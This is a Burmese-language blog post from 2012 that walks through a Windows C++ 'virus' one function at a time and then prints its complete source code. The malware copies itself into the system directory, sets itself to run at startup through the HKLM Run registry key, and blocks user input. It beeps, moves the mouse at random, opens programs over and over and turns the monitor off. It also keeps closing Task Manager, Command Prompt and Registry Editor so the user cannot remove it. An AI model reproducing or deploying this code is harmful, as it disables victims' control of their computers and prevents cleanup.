Member ၀င္ရန္.............

Thursday, September 20, 2012

တိုက္ခိုက္မႈ ၾကမ္းတဲ့Virus မ်ား


ဒါလည္း စမ္းလို႔ေကာင္းတဲ႔အမ်ိဳးအစားထဲမွာေတာ့ မပါ ပါဘူး။ သူရဲ႕တိုက္ခိုက္မႈက နည္းနည္းၾကမ္းတယ္ဗ်။ ဒီVirus ရဲ႕ Include header ဖိုင္ေတြကေတာ့ iostream,stdio,windows,winable,conio နဲ႔ ctime တို႔ျဖစ္ပါတယ္။
monitor ကို Turn off ျဖစ္သြားေအာင္ လုပ္ဖို႔အတြက္ ေအာက္က code ေတြကို အသံုးျပဳထားပါတယ္...



void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}


ေနာက္တခုက rand var's ႏွစ္ခုျပဳလုပ္ျပီး တိုက္ခိုက္ခံရသူရဲ႕ mouse ကို crazy ျဖစ္သြားေအာင္ လုပ္တာပါ။ အဲဒီ code ေတြကေတာ့....

void CrazyMouse()
{
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}


ေနာက္တခုက open ခ်င္ရာေတြေလွ်ာက္ open ေနေအာင္ လုပ္တာပါ။ အဲဒါကို OpenStuff လို႔ေျပာၾကပါတယ္။ ေအာက္က code ေတြကိုၾကည့္ပါ။

void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXI MIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_ MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIM IZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXI MIZE);
}


ေအာက္မွာရွိတဲ႔ code ေတြကေတာ့ Find windwos မွာ by name ေပးျပီး သူတို႔ကို ပ်က္စီးသြားေအာင္ ဖ်က္ဆီးျခင္း နဲ႔ windows title ေတြကို rename ေပးျပီး close သြားေအာင္ လုပ္တာပါ။ FindWindow command ေတြကို ပ်က္ျပယ္သြားေအာင္၊ မပ်က္ျပယ္ဘူး ဆိုရင္ေတာင္ command တခုေပးျပီး windon ကိုု open ပါလိမ့္မယ္။ code ေတြကို ေလ့လာၾကည့္ပါ...

DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}


ေနာက္တစ္ခုကေတာ့ Windows စတက္လာတာနဲ႔ Virus ကို run ေနေစေအာင္registry ထဲမွာVirus ကို Add တဲ႔ code ေတြျဖစ္ပါတယ္...

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\W indows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);


ေနာက္ဆံုးတစ္ခုကေတာ့ computerရဲ႕ beep ကို rand numbers ေတြအားျဖင့္ ကြဲျပားျခားနားတဲ႔ freq ေတြ lengths ေတြနဲ႔ ထြက္ေပၚေနေအာင္လုပ္တာပါ...

void Beeper()
{
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}


ဒီ Virus ရဲ႕ code အျပည့္အစံုကို ေအာက္မွာေဖာ္ျပေပးထားပါတယ္။ ေလ့လာၾကည့္ပါ...

#include <iostream>
#include <stdio.h>
#include <windows.h>
#include <winable.h>
#include <conio.h>
#include <ctime>
using namespace std;

int random, Freq, Dur, X, Y;
HWND mywindow, TaskMgr, CMD, Regedit;
char Notepad[MAX_PATH]="notepad.exe";
char MineSweeper[MAX_PATH]="winmine.exe";
char Hearts[MAX_PATH]="mshearts.exe";
char Website[MAX_PATH]="http:\\www.google.com";

void SetUp();
void Run( int ID );
void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();

DWORD WINAPI DestroyWindows(LPVOID);

int main()
{
srand( time(0) );
random = rand()%6;
system("title :.Virus.:");
BlockInput( true );
SetUp();
BlockInput( false );
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
while(1)
{
Run( random );
Sleep(10);
}
}
void SetUp()
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\winminer.exe");
CopyFile(pathtofile,system,false);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);

mywindow = FindWindow(NULL,":.Virus.:");
cout<<"You Are Doomed cyberot";
Sleep(1000);
ShowWindow(mywindow, false);
}

void Run( int ID )
{
if( ID == 1 )
{
BlockInput(true);
}
else if( ID == 2 )
{
Beeper();
}
else if( ID == 3 )
{
OpenStuff();
}
else if( ID == 4 )
{
Hibernation();
}
else if( ID == 5 )
{
CrazyMouse();
}
else
{
BlockInput(true);
Beeper();
OpenStuff();
CrazyMouse();
}
}

void Beeper()
{
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}
void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXIMIZE);
}
void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}
void CrazyMouse()
{
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}

DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}

Sleep(10);
}
}  
 ၾကိဳေျပာထားတယ္မယ္ေနာ္  စမ္းလို႔ေကာင္းမယ့္virusေတြထဲမွာ တား  ေရးတဲ့virusေတြမပါဘူး

တစ္ခုခုျဖစ္ရင္တားတားမပါဘူးေနာ္

Reactions:

0 comments:

Post a Comment